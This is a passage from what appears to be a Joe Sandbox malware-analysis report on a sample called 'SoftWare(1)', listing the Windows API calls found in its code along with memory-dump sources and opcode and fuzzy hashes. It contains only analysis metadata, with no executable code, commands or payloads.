                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                      • String ID: HideWindow
                                                                                                                                                                                                                                      • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                      • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4115351271-0
                                                                                                                                                                                                                                      • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                      • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                      • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                      • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                      • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                      • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                                                                      • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                      • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                      • String ID: $ @$M$N
                                                                                                                                                                                                                                      • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
